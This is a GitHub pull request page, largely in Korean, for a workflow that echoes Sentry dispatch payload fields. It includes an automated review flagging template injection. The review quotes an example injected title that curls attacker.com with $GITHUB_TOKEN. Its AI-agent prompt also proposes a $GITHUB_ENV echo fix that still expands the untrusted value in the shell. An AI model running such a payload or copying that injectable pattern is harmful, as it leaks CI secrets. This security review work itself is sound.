[공통] sentry dispatch 테스트#1274
Conversation
워크스루repository_dispatch 이벤트의 sentry-error 타입에 대응하는 GitHub 액션 워크플로를 추가합니다. Sentry 페이로드의 주요 필드들을 표준 출력으로 검증합니다. 변경사항Sentry 디스패치 테스트 워크플로
추정 코드 리뷰 난이도🎯 1 (간단함) | ⏱️ ~5분 제안 라벨
제안 리뷰어
🚥 Pre-merge checks | ✅ 5✅ Passed checks (5 passed)
✏️ Tip: You can configure your own custom pre-merge checks in the settings. ✨ Finishing Touches🧪 Generate unit tests (beta)
Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out. Comment |
There was a problem hiding this comment.
Actionable comments posted: 1
🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
Inline comments:
In @.github/workflows/sentry-dispatch-test.yml:
- Around line 14-19: The echo lines directly expand github.event.client_payload
fields into the shell, allowing command injection; instead set those values into
GitHub Actions environment variables (e.g. write ISSUE_ID, TITLE, SENTRY_URL,
ENVIRONMENT, LEVEL, PROJECT into $GITHUB_ENV using lines like echo "ISSUE_ID=${{
github.event.client_payload.issue_id }}" >> $GITHUB_ENV) and then reference the
safe env vars in subsequent run steps (e.g. echo "Issue ID: $ISSUE_ID"),
replacing the direct uses of ${{ github.event.client_payload.title }}, ${{
github.event.client_payload.sentry_url }}, ${{
github.event.client_payload.environment }}, ${{
github.event.client_payload.level }}, and ${{
github.event.client_payload.project }}.
🪄 Autofix (Beta)
Fix all unresolved CodeRabbit comments on this PR:
- Push a commit to this branch (recommended)
- Create a new PR with the fixes
ℹ️ Review info
⚙️ Run configuration
Configuration used: Path: .coderabbit.yaml
Review profile: CHILL
Plan: Pro
Run ID: 3b32a9b1-94ea-4ed0-bb0a-914340ab2d5d
📒 Files selected for processing (1)
.github/workflows/sentry-dispatch-test.yml
| echo "Issue ID: ${{ github.event.client_payload.issue_id }}" | ||
| echo "Title: ${{ github.event.client_payload.title }}" | ||
| echo "Sentry URL: ${{ github.event.client_payload.sentry_url }}" | ||
| echo "Environment: ${{ github.event.client_payload.environment }}" | ||
| echo "Level: ${{ github.event.client_payload.level }}" | ||
| echo "Project: ${{ github.event.client_payload.project }}" |
There was a problem hiding this comment.
템플릿 인젝션 취약점: client_payload를 직접 셸 명령에 확장하지 마세요.
외부 웹훅 리시버에서 전송되는 client_payload 값을 셸 명령에 직접 확장(${{ }})하면 명령 인젝션 공격에 취약합니다. 악의적인 페이로드에 셸 메타문자(;, $(), `, 등)가 포함될 경우 임의 코드가 실행될 수 있습니다.
예를 들어, title 필드에 "; curl http://attacker.com?token=$GITHUB_TOKEN; echo "와 같은 값이 포함되면 민감한 정보가 유출되거나 CI 환경이 손상될 수 있습니다.
🔒 권장 수정: 환경 변수를 통한 안전한 값 전달
steps:
- name: Print Sentry payload
+ env:
+ ISSUE_ID: ${{ github.event.client_payload.issue_id }}
+ TITLE: ${{ github.event.client_payload.title }}
+ SENTRY_URL: ${{ github.event.client_payload.sentry_url }}
+ ENVIRONMENT: ${{ github.event.client_payload.environment }}
+ LEVEL: ${{ github.event.client_payload.level }}
+ PROJECT: ${{ github.event.client_payload.project }}
run: |
- echo "Issue ID: ${{ github.event.client_payload.issue_id }}"
- echo "Title: ${{ github.event.client_payload.title }}"
- echo "Sentry URL: ${{ github.event.client_payload.sentry_url }}"
- echo "Environment: ${{ github.event.client_payload.environment }}"
- echo "Level: ${{ github.event.client_payload.level }}"
- echo "Project: ${{ github.event.client_payload.project }}"
+ echo "Issue ID: $ISSUE_ID"
+ echo "Title: $TITLE"
+ echo "Sentry URL: $SENTRY_URL"
+ echo "Environment: $ENVIRONMENT"
+ echo "Level: $LEVEL"
+ echo "Project: $PROJECT"환경 변수로 설정할 때 GitHub Actions가 자동으로 이스케이프 처리하므로 인젝션 공격을 방지할 수 있습니다.
🧰 Tools
🪛 zizmor (1.25.2)
[error] 14-14: code injection via template expansion (template-injection): may expand into attacker-controllable code
(template-injection)
[error] 15-15: code injection via template expansion (template-injection): may expand into attacker-controllable code
(template-injection)
[error] 16-16: code injection via template expansion (template-injection): may expand into attacker-controllable code
(template-injection)
[error] 17-17: code injection via template expansion (template-injection): may expand into attacker-controllable code
(template-injection)
[error] 18-18: code injection via template expansion (template-injection): may expand into attacker-controllable code
(template-injection)
[error] 19-19: code injection via template expansion (template-injection): may expand into attacker-controllable code
(template-injection)
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
In @.github/workflows/sentry-dispatch-test.yml around lines 14 - 19, The echo
lines directly expand github.event.client_payload fields into the shell,
allowing command injection; instead set those values into GitHub Actions
environment variables (e.g. write ISSUE_ID, TITLE, SENTRY_URL, ENVIRONMENT,
LEVEL, PROJECT into $GITHUB_ENV using lines like echo "ISSUE_ID=${{
github.event.client_payload.issue_id }}" >> $GITHUB_ENV) and then reference the
safe env vars in subsequent run steps (e.g. echo "Issue ID: $ISSUE_ID"),
replacing the direct uses of ${{ github.event.client_payload.title }}, ${{
github.event.client_payload.sentry_url }}, ${{
github.event.client_payload.environment }}, ${{
github.event.client_payload.level }}, and ${{
github.event.client_payload.project }}.
Source: Linters/SAST tools
What is this PR? 🔍
Changes 📝
repository_dispatch호출 시 GitHub Actions 실행 여부 확인용 테스트 workflow 추가sentry-error타입 이벤트 수신 시client_payload필드 출력ScreenShot 📷
N/A
Precaution
webhook 요청을 위한 receiver 서버 추가
✔️ Please check if the PR fulfills these requirements
developbranch unconditionally?main?yarn lintSummary by CodeRabbit
릴리스 노트